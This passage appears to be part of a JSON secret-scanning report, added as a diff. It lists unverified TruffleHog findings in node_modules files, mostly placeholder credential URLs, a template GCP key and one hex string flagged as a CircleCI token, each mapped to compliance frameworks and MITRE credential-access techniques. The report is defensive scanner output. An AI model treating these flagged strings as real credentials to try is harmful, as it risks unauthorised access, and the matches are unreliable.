"mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f081eac965f118df", + "ruleId": "URI", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/@types/node/url.d.ts", + "startLine": 0 + }, + "message": "https://123:xyz@example.com", + "title": "URI secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/@types/node/url.d.ts", + "line": 722 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 17, + "DetectorName": "URI", + "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationFromCache": false, + "Raw": "https://123:xyz@example.com", + "RawV2": "https://123:xyz@example.com", + "Redacted": "https://123:********@example.com", + "ExtraData": null, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a18230c14354e278", + "ruleId": "URI", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/@types/node/url.d.ts", + "startLine": 0 + }, + "message": "https://abc:xyz@example.com", + "title": "URI secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/@types/node/url.d.ts", + "line": 716 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 17, + "DetectorName": "URI", + "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationFromCache": false, + "Raw": "https://abc:xyz@example.com", + "RawV2": "https://abc:xyz@example.com", + "Redacted": "https://abc:********@example.com", + "ExtraData": null, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "f03f52d67f2ae961", + "ruleId": "URI", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/@types/node/url.d.ts", + "startLine": 0 + }, + "message": "https://abc:123@example.com", + "title": "URI secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/@types/node/url.d.ts", + "line": 557 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 17, + "DetectorName": "URI", + "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationFromCache": false, + "Raw": "https://abc:123@example.com", + "RawV2": "https://abc:123@example.com", + "Redacted": "https://abc:********@example.com", + "ExtraData": null, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "71285c8155080cef", + "ruleId": "URI", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/faye-websocket/README.md", + "startLine": 0 + }, + "message": "http://username:password@proxy.example.com", + "title": "URI secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/faye-websocket/README.md", + "line": 122 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 17, + "DetectorName": "URI", + "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "lookup proxy.example.com on 192.168.65.7:53: no such host", + "VerificationFromCache": false, + "Raw": "http://username:password@proxy.example.com", + "RawV2": "http://username:password@proxy.example.com", + "Redacted": "http://username:********@proxy.example.com", + "ExtraData": null, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "cf9d5ac0f2fa1e76", + "ruleId": "URI", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/firebase-admin/node_modules/@types/node/https.d.ts", + "startLine": 0 + }, + "message": "https://abc:xyz@example.com", + "title": "URI secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/firebase-admin/node_modules/@types/node/https.d.ts", + "line": 429 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 17, + "DetectorName": "URI", + "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationFromCache": true, + "Raw": "https://abc:xyz@example.com", + "RawV2": "https://abc:xyz@example.com", + "Redacted": "https://abc:********@example.com", + "ExtraData": null, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "40e557d25e059317", + "ruleId": "URI", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/firebase-admin/node_modules/@types/node/http.d.ts", + "startLine": 0 + }, + "message": "http://abc:xyz@example.com", + "title": "URI secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/firebase-admin/node_modules/@types/node/http.d.ts", + "line": 1817 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 17, + "DetectorName": "URI", + "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationFromCache": true, + "Raw": "http://abc:xyz@example.com", + "RawV2": "http://abc:xyz@example.com", + "Redacted": "http://abc:********@example.com", + "ExtraData": null, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "919e333a335f73d4", + "ruleId": "URI", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts", + "startLine": 0 + }, + "message": "https://abc:xyz@example.com", + "title": "URI secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts", + "line": 736 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 17, + "DetectorName": "URI", + "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", + "DecoderName": "ESCAPED_UNICODE", + "Verified": false, + "VerificationFromCache": true, + "Raw": "https://abc:xyz@example.com", + "RawV2": "https://abc:xyz@example.com", + "Redacted": "https://abc:********@example.com", + "ExtraData": null, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "aa9f19a78a21fb70", + "ruleId": "URI", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts", + "startLine": 0 + }, + "message": "https://123:xyz@example.com", + "title": "URI secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts", + "line": 742 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 17, + "DetectorName": "URI", + "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationFromCache": true, + "Raw": "https://123:xyz@example.com", + "RawV2": "https://123:xyz@example.com", + "Redacted": "https://123:********@example.com", + "ExtraData": null, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6d8ae777484be698", + "ruleId": "URI", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts", + "startLine": 0 + }, + "message": "https://abc:123@example.com", + "title": "URI secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts", + "line": 577 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 17, + "DetectorName": "URI", + "DetectorDescription": "This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationFromCache": true, + "Raw": "https://abc:123@example.com", + "RawV2": "https://abc:123@example.com", + "Redacted": "https://abc:********@example.com", + "ExtraData": null, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "170043ac8ee06ba6", + "ruleId": "GCP", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/google-auth-library/README.md", + "startLine": 0 + }, + "message": "your-client-email", + "title": "GCP secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/google-auth-library/README.md", + "line": 323 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 6, + "DetectorName": "GCP", + "DetectorDescription": "GCP (Google Cloud Platform) is a suite of cloud computing services that runs on the same infrastructure that Google uses internally for its end-user products. GCP keys can be used to access and manage these services.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationError": "private key should be a PEM or plain PKCS1 or PKCS8; parse error: asn1: structure error: tags don't match (16 vs {class:1 tag:25 length:111 isCompound:true}) {optional:false explicit:false application:false private:false defaultValue: tag: stringType:0 timeType:0 set:false omitEmpty:false} pkcs1PrivateKey @2", + "VerificationFromCache": false, + "Raw": "your-client-email", + "RawV2": "{\"type\":\"service_account\",\"project_id\":\"your-project-id\",\"private_key_id\":\"your-private-key-id\",\"private_key\":\"your-private-key\",\"client_email\":\"your-client-email\",\"client_id\":\"your-client-id\",\"auth_uri\":\"https://accounts.google.com/o/oauth2/auth\",\"token_uri\":\"https://accounts.google.com/o/oauth2/token\",\"auth_provider_x509_cert_url\":\"https://www.googleapis.com/oauth2/v1/certs\",\"client_x509_cert_url\":\"your-cert-url\"}", + "Redacted": "your-client-email", + "ExtraData": { + "private_key_id": "your-private-key-id", + "project": "your-project-id", + "rotation_guide": "https://howtorotate.com/docs/tutorials/gcp/" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + ], + "cweTop25_2024": [ + { + "id": "CWE-798", + "rank": 18, + "category": "Credentials" + } + ], + "cisControlsV8_1": [ + { + "control": "3.11", + "title": "Encrypt Sensitive Data at Rest", + "implementationGroup": "IG1" + }, + { + "control": "5.4", + "title": "Restrict Administrator Privileges to Dedicated Administrator Accounts", + "implementationGroup": "IG1" + } + ], + "nistCsf2_0": [ + { + "function": "PROTECT", + "category": "PR.AC", + "subcategory": "PR.AC-1", + "description": "Identities and credentials are issued, managed, verified, revoked, and audited" + }, + { + "function": "PROTECT", + "category": "PR.DS", + "subcategory": "PR.DS-1", + "description": "Data-at-rest is protected" + } + ], + "pciDss4_0": [ + { + "requirement": "8.3.2", + "description": "Strong cryptography for authentication credentials", + "priority": "CRITICAL" + }, + { + "requirement": "8.2.1", + "description": "Verify user identity before credential modification", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Credential Access", + "technique": "T1552", + "techniqueName": "Unsecured Credentials", + "subtechnique": "T1552.001", + "subtechniqueName": "Credentials in Files" + }, + { + "tactic": "Initial Access", + "technique": "T1078", + "techniqueName": "Valid Accounts", + "subtechnique": "", + "subtechniqueName": "" + } + ] + }, + "priority": { + "priority": 13.333333333333332, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 4, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d5d31157dd10c1ff", + "ruleId": "Circle", + "severity": "MEDIUM", + "tool": { + "name": "trufflehog", + "version": "unknown" + }, + "location": { + "path": "/scan/node_modules/ip-address/README.md", + "startLine": 0 + }, + "message": "7baede7efd3db5f1f25fb439e97d5f695ff76318", + "title": "Circle secret", + "description": "Potential secret detected by TruffleHog", + "remediation": "Rotate credentials and purge from history.", + "references": [], + "tags": [ + "secrets", + "unverified" + ], + "risk": { + "cwe": [ + "CWE-798" + ], + "confidence": "MEDIUM", + "likelihood": "HIGH", + "impact": "HIGH" + }, + "raw": { + "SourceMetadata": { + "Data": { + "Filesystem": { + "file": "/scan/node_modules/ip-address/README.md", + "line": 1 + } + } + }, + "SourceID": 1, + "SourceType": 15, + "SourceName": "trufflehog - filesystem", + "DetectorType": 4, + "DetectorName": "Circle", + "DetectorDescription": "CircleCI is a continuous integration and delivery platform used to build, test, and deploy software. CircleCI tokens can be used to interact with the CircleCI API and access various resources and functionalities.", + "DecoderName": "PLAIN", + "Verified": false, + "VerificationFromCache": false, + "Raw": "7baede7efd3db5f1f25fb439e97d5f695ff76318", + "RawV2": "", + "Redacted": "", + "ExtraData": { + "Version": "1" + }, + "StructuredData": null + }, + "compliance": { + "owaspTop10_2021": [ + "A02:2021" + 